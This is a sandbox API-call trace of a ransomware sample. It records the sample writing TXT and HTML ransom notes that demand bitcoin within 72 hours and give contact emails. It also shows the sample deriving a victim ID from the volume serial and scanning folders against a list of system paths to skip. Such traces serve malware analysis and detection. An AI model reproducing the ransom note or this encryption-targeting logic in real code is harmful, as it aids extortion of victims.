	[0172.723] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov"
	[0172.723] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*"
	[0172.723] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.724] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.724] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0172.724] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.724] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0172.724] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0172.740] CloseHandle (hObject=0x390) returned 1
	[0172.741] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.741] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.742] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0172.743] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0172.743] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.743] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0172.744] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0172.744] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0172.744] CloseHandle (hObject=0x390) returned 1
	[0172.745] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.745] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.745] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0172.745] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0172.745] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.752] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0172.752] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0172.755] CloseHandle (hObject=0x390) returned 1
	[0172.755] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.756] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.756] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.756] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0172.758] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.758] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.759] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0172.759] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.759] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0172.760] CloseHandle (hObject=0x390) returned 1
	[0172.760] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x807aa70f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x807f6bfc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0172.761] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*") returned 89
	[0172.761] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.761] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*") returned 0x59
	[0172.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.761] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0172.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.761] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0172.761] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.762] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0172.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.762] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.762] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0172.762] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.763] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0172.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.763] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.763] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0172.763] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.763] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0172.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.764] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0172.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.764] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0172.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.764] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0172.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.765] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.765] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0172.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.765] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0172.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.765] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0172.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.766] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0172.766] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.766] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0172.766] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.766] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0172.766] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0172.766] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0172.766] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x807aa70f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x807f6bfc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="..", cAlternateFileName="")) returned 1
	[0172.767] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0172.767] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x807f6bfc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x807f6bfc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8081cdf3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0172.767] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x807aa70f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x807aa70f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x807f6bfc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0172.767] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0172.767] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0172.767] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0172.767] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov"
	[0172.767] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\"
	[0172.768] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime"
	[0172.768] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime"
	[0172.768] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\"
	[0172.768] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\"
	[0172.768] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*"
	[0172.768] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName=".", cAlternateFileName="")) returned 0xfb91b0
	[0172.782] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*") returned 97
	[0172.782] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.782] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*") returned 0x61
	[0172.782] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0172.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0172.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0172.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0172.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0172.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0172.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0172.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0172.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0172.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0172.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
